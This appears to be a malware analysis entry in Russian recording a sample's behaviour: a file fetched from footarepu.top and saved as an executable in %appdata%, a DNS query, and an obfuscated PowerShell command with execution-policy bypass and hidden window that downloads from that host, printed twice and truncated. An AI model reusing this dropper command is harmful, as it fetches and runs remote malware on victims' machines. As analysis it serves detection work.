Техническая информация
- http://footarepu.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PowERshE^L^L^.^exe^ -eXEcUTIOnpo^L^i^Cy BY^paSs ^-NOpr^of^Il^E -W^InDow^s^T^YLE hiDdE^n (^n^Ew-objec^t S^YST^eM^.^nEt^.^wEbcLi^eNt).^dowNlOaD^fI^le(^'http://footarepu.top/read.ph...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /c "PowERshE^L^L^.^exe^ -eXEcUTIOnpo^L^i^Cy BY^paSs ^-NOpr^of^Il^E -W^InDow^s^T^YLE hiDdE^n (^n^Ew-objec^t S^YST^eM^.^nEt^.^wEbcLi^eNt).^dowNlOaD^fI^le(^'http://footarepu.top/read.ph...' (со скрытым окном)